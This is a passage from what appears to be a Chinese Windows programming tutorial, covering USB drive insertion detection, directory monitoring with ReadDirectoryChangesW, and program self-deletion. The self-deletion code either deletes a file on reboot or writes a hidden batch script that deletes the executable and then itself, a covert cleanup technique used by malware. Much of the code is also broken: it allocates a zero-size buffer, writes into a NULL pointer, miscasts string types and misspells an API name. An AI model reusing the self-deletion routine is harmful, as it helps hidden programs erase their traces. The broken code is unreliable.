	case DBT_DEVICEARRIVAL: { //设备插入
		PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam;
		if (DBT_DEVTYP_VOLUME == lpdb->dbch_devicetype) { //逻辑卷
			PDEV_BROADCAST_VOLUME lpdbv = (PDEV_BROADCAST_VOLUME)lpdb;
			DWORD dwDriverMask = lpdbv->dbcv_unitmask; //逻辑单元掩码
			DWORD dwTemp = 1;
			char szDriver[4] = "A:\\";
			for (szDriver[0] = 'A'; szDriver[0] <= 'Z'; szDriver[0]++) {
				if (0 < (dwTemp & dwDriverMask))
					::MessageBox(NULL, (LPCWSTR)szDriver, L"设备已插入", MB_OK); //szDriver即为盘符
				dwTemp <<= 1;
			};
		};
		break;
	};
	case DBT_DEVICEREMOVECOMPLETE: //设备移除
		//跟上面一样
		break;
	default:
		break;
	};
	return 0;
};
BOOL CALLBACK ProgMainDlg(HWND hWnd, UINT uiMsg, WPARAM wParam, LPARAM lParam) {
	if (WM_DEVICECHANGE == uiMsg)
		OnDeviceChange(wParam, lParam);
	else if (WM_CLOSE == uiMsg)
		::EndDialog(hWnd, NULL);
	return FALSE;
};
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevinstance, LPSTR lpCmdLine, int nCmdShow) {
	::DialogBoxParam(hInstance, (LPCSTR)IDD_DIALOG1, NULL, (DLGPROC)ProgMainDlg, NULL);
	::ExitProcess(NULL);
	return 0;
};

文件监控

ReadDirectoryChangesW

监控文件目录。

1
2
3
4
5
6
7
8
9
10
11
12
BOOL WINAPI ReadDirectoryChagnesW(
    _In_ HANDLE hDirectory,
    //要监视的目录句柄
    _Out_ LPVOID lpBuffer,
    _In_ DWORD nBufferLength,
    _In_ BOOL bWatchSubtree,
    //TRUE监视整个该目录的目录树 FALSE仅当前目录
    _In_ DWORD dwNotifyFilter,
    _Out_ptr_ LPDWORD lpBytesReturned,
    _Inout_opt_ LPOVERLAPPED lpOverlapped,
    _In_opt_ LPOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine
)//同步成功/异步排队成功非0 失败0

例子

监控C盘文件更改。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
DWORD CALLBACK MonitorFileThreadProc(LPVOID lpVoid) {
	LPCWSTR pszDirectory = (LPCWSTR)lpVoid;
	DWORD dwBufferSize = 0;
	BOOL bRet = FALSE;
	DWORD dwRet = 0;
	PCHAR szTemp = NULL;
	HANDLE hDirectory = ::CreateFile(pszDirectory, FILE_LIST_DIRECTORY, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL);
	if (INVALID_HANDLE_VALUE == hDirectory)
		return 1;
	PBYTE pBuf = new BYTE[dwBufferSize];
	if (NULL == pBuf)
		return 2;
	FILE_NOTIFY_INFORMATION* pFileNotifyInfo = (FILE_NOTIFY_INFORMATION*)pBuf;
	do {
		::RtlZeroMemory(pFileNotifyInfo, dwBufferSize);
		bRet = ::ReadDirectoryChangesW(hDirectory, pFileNotifyInfo, dwBufferSize, TRUE, FILE_NOTIFY_CHANGE_FILE_NAME | FILE_NOTIFY_CHANGE_ATTRIBUTES | FILE_NOTIFY_CHANGE_LAST_WRITE, &dwRet, NULL, NULL);
		if (FALSE == bRet)
			break;
		::WideCharToMultiByte(CP_ACP, 0, (wchar_t*)(&pFileNotifyInfo->FileName), (pFileNotifyInfo->FileNameLength/2), szTemp, MAX_PATH, NULL, NULL);
		switch (pFileNotifyInfo->Action) {
			case FILE_ACTION_ADDED: {
				printf("%s\n", szTemp);
				break;
			};
			case FILE_ACTION_REMOVED: {
				printf("%s\n", szTemp);
				break;
			};
			case FILE_ACTION_MODIFIED: {
				printf("%s\n", szTemp);
				break;
			};
			case FILE_ACTION_RENAMED_OLD_NAME: {
				printf("%s\n", szTemp);
				if (0 != pFileNotifyInfo->NextEntryOffset) {
					FILE_NOTIFY_INFORMATION* tmpBuffer = (FILE_NOTIFY_INFORMATION*)((DWORD)pFileNotifyInfo + pFileNotifyInfo->NextEntryOffset);
					switch (tmpBuffer->Action) {
						case FILE_ACTION_RENAMED_NEW_NAME: {
							::RtlZeroMemory(szTemp, MAX_PATH);
							WideCharToMultiByte(CP_ACP, 0, tmpBuffer->FileName, (tmpBuffer->FileNameLength / 2), szTemp, MAX_PATH, NULL, NULL);
							printf("-> %s\n", szTemp);
							break;
						};
						default:
							break;
					};
				};
				break;
			};
			case FILE_ACTION_RENAMED_NEW_NAME: {
				printf("%s\n", szTemp);
				break;
			};
		};
	} while (bRet);
	::CloseHandle(hDirectory);
	return 0;
};
int main(int argc,char* argv[]) {
	char* pszDirectory = (char*)"C:\\";
	HANDLE hThread = ::CreateThread(NULL, 0, MonitorFileThreadProc, pszDirectory, 0, NULL);
	::WaitForSingleObject(hThread, INFINITE);
	::CloseHandle(hThread);
	return 0;
};

自删除

MoveFileEx

移动现有文件或目录。

1
2
3
4
5
6
7
8
BOOL WINAPI MoveFileEx(
    _In_ LPCTSTR lpExistingFileName,
    //已存在的
    _In_ LPCTSTR lpNewFileName,
    //还未存在的
    _In_ DWORD dwFlags
    //选项 有枚举值
)//成功TRUE 失败FALSE

重启删除

在管理员或系统权限下使用MOVEFILE_DELAY_UNTIL_REBOOT时,该文件在启动AUTOCHK执行之后,页面文件创建之前,还未进入操作系统,所以想删啥删啥。该选项不能跟MOVEFILE_COPY_ALLOWED同时使用,这个选项在跨卷移动时用。删除路径前要加上前缀\\?\来表示为Unicode版本。

1
2
3
4
5
6
BOOL RebootDelete(PWCHAR pszFileName) {
	WCHAR szTemp[MAX_PATH] = L"\\\\?\\";
	::lstrcat(szTemp, pszFileName);
	BOOL bRet = ::MoveFileEx(szTemp, NULL, MOVEFILE_DELAY_UNTIL_REBOOT);
	return bRet;
};

自删除

写批处理并运行,命令为del %0,延时$5$秒用choice的超时或ping来实现。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
#include <tchar.h>
BOOL CreateChoiceBat(PWCHAR pszBatFileName) {
	INT iTime = 5;  // 等待多少秒后删除文件
	WCHAR szBat[MAX_PATH] = { 0 };
	::wsprintf(szBat, L"@echo off\nchoice /t %d /d y /n >nul\ndel 33.exe\ndel %%0\n", iTime);
	FILE* fp = NULL;
	fopen_s(&fp, (PCHAR)pszBatFileName, "w+");
	if (NULL == fp)
		return FALSE;
	fwrite(szBat, (1 + ::lstrlen(szBat)), 1, fp);
	fclose(fp);
	return TRUE;
};
BOOL CreatePingBat(PWCHAR pszBatFileName) {
	INT iTime = 5; // 等待多少秒后删除文件
	WCHAR szBat[MAX_PATH] = { 0 };
	::wsprintf(szBat, L"@echo off\nping 127.0.0.1 -n %d\ndel 33.exe\ndel %%0\n", iTime);
	FILE* fp = NULL;
	fopen_s(&fp, (PCHAR)pszBatFileName, "w+");
	if (NULL == fp)
		return FALSE;
	fwrite(szBat, (1 + ::lstrlen(szBat)), 1, fp);
	fclose(fp);
	return TRUE;
};
BOOL DelSelf(int iType) {
	BOOL bRet = FALSE;
	WCHAR szCurrentDirectory[MAX_PATH] = { 0 };
	WCHAR szBatFileName[MAX_PATH] = { 0 };
	WCHAR szCmd[MAX_PATH] = { 0 };
	::GetModuleFileName(NULL, szCurrentDirectory, MAX_PATH);
	char* p = ::strrchr((PCHAR)szCurrentDirectory, '\\');
	p[0] = '\0';
	::wsprintf(szBatFileName, L"%s\\temp.bat", szCurrentDirectory);
	::wsprintf(szCmd, L"cmd /c call \"%s\"", szBatFileName);
	if (0 == iType)
		bRet = CreateChoiceBat(szBatFileName);
	else if (1 == iType)
		bRet = CreatePingBat(szBatFileName);
	if (bRet) {
		STARTUPINFO si = { 0 };
		PROCESS_INFORMATION pi;
		si.cb = sizeof(si);
		si.dwFlags = STARTF_USESHOWWINDOW;
		si.wShowWindow = FALSE;
		BOOL bRet = CreateProcess(NULL, szCmd, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
		if (bRet) {
			CloseHandle(pi.hThread);
			CloseHandle(pi.hProcess);
			exit(0);
			::ExitProcess(NULL);
		};
	};
	return bRet;
};
int _tmain(int argc, _TCHAR* argv[]){
	BOOL bRet = DelSelf(0);
	if (FALSE == bRet)
		printf("Selft Delete Error!\n");
	else
		printf("Selft Delete OK!\n");
	system("pause");
	return 0;
};